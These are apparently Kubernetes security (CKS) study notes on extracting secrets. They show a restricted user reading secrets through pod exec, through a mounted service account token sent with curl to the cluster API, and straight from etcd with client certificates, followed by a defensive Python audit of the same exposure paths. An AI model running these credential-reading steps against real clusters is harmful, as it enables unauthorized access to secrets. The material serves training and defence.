# Hack Secrets

###### tags: `CKS Day2`

## 1. Create a Secret

```
kubectl create secret generic db-user-pass --from-literal=username=admin --from-literal=password='really-secret-password'
```

## 2. To decode the values

```
kubectl get secret db-user-pass -o yaml | grep password
echo "cmVhbGx5LXNlY3JldC1wYXNzd29yZAo=" | base64 -d
kubectl get secret db-user-pass -o jsonpath='{.data.password}' | base64 -d
```

## 3. Mount the Secret into a Pod

Mount it into the Pod named redis, container name kvdb1, volume name kvdb-secret, mounted at /etc/kbdb-secret.

https://kubernetes.io/docs/concepts/configuration/secret/#using-secrets-as-files-from-a-pod

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: mypod
spec:
  containers:
  - name: mypod
    image: redis
    volumeMounts:
    - name: foo
      mountPath: "/etc/foo"
      readOnly: true
  volumes:
  - name: foo
    secret:
      secretName: mysecret
```

## Hack Secrets in Docker with no permissions to view RBAC resources

```
k -n restricted get secret
```

```
Error from server (Forbidden): secrets is forbidden: User "restricted" cannot list resource "secrets" in API group "" in the namespace "restricted"
```

```
k -n restricted get all
```

![](https://i.imgur.com/5FCpcNZ.png)

```
k -n restricted exec pod1-fd5d64b9c-pcx6q -- cat /etc/secret-volume/password
```

```
k -n restricted exec pod2-6494f7699b-4hks5 -- env | grep PASS
```

```
k -n restricted exec -it pod3-748b48594-24s76 -- sh
/ # mount | grep serviceaccount
tmpfs on /run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/ # ls /run/secrets/kubernetes.io/serviceaccount
ca.crt     namespace  token
```

```
/ # curl https://kubernetes.default/api/v1/namespaces/restricted/secrets -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" -k
...
    {
      "metadata": {
        "name": "secret3",
        "namespace": "restricted",
        ...
          }
        ]
      },
      "data": {
        "password": "cEVuRXRSYVRpT24tdEVzVGVSCg=="
      },
      "type": "Opaque"
    }
...
```

## Hack Secrets in etcd

```
ETCDCTL_API=3 etcdctl \
  --cert /etc/kubernetes/pki/apiserver-etcd-client.crt \
  --key /etc/kubernetes/pki/apiserver-etcd-client.key \
  --cacert /etc/kubernetes/pki/etcd/ca.crt \
  get /registry/secrets/team-green/database-access
```

## ETCD Encryption
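The restricted-namespace walk-through above shows three ways a pod hands its secrets to anyone who can `kubectl exec` into it: a secret volume (pod1), a secret-backed environment variable (pod2) and an auto-mounted service account token (pod3). The script below is an added defensive check, not part of these notes, that flags those three patterns in `kubectl get pods -o json` output; the embedded pod list, pod names and secret names are constructed samples.

```python
"""Audit a Pod list (kubectl get pods -o json) for the three secret-exposure
paths shown above: secret volumes, secret-backed env vars, auto-mounted SA tokens."""
import json

# Constructed sample in the shape of `kubectl -n restricted get pods -o json`;
# pod and secret names are illustrative, not from a real cluster.
SAMPLE_PODS = json.dumps({"items": [
    {"metadata": {"name": "pod1"}, "spec": {
        "containers": [{"name": "c", "volumeMounts": [{"name": "sv", "mountPath": "/etc/secret-volume"}]}],
        "volumes": [{"name": "sv", "secret": {"secretName": "secret1"}}]}},
    {"metadata": {"name": "pod2"}, "spec": {
        "automountServiceAccountToken": False,
        "containers": [{"name": "c", "env": [
            {"name": "PASSWORD", "valueFrom": {"secretKeyRef": {"name": "secret2", "key": "password"}}}]}]}},
    {"metadata": {"name": "pod3"}, "spec": {
        "containers": [{"name": "c", "envFrom": [{"secretRef": {"name": "secret3"}}]}]}},
]})


def audit_pods(pod_list_json):
    """Return (pod name, finding) tuples, one per exposure path found."""
    findings = []
    for pod in json.loads(pod_list_json).get("items", []):
        name = pod["metadata"]["name"]
        spec = pod["spec"]
        # Path 1: secret mounted as files -> readable with `exec -- cat`
        for vol in spec.get("volumes", []):
            if "secret" in vol:
                findings.append((name, f"secret volume {vol['secret']['secretName']}"))
        for ctr in spec.get("containers", []) + spec.get("initContainers", []):
            # Path 2: secret in the environment -> readable with `exec -- env`
            for env in ctr.get("env", []):
                ref = env.get("valueFrom", {}).get("secretKeyRef")
                if ref:
                    findings.append((name, f"env {env['name']} from secret {ref['name']}"))
            for src in ctr.get("envFrom", []):
                if "secretRef" in src:
                    findings.append((name, f"envFrom secret {src['secretRef']['name']}"))
        # Path 3: SA token auto-mounted -> usable against the API from inside the pod.
        # Only the pod-level field is checked; the ServiceAccount object can also disable it.
        if spec.get("automountServiceAccountToken", True):
            findings.append((name, "service account token auto-mounted"))
    return findings


if __name__ == "__main__":
    for pod, finding in audit_pods(SAMPLE_PODS):
        print(f"{pod}: {finding}")
```

Pipe real output in with `kubectl -n <ns> get pods -o json` and pass it to `audit_pods` to run the same check against a live namespace.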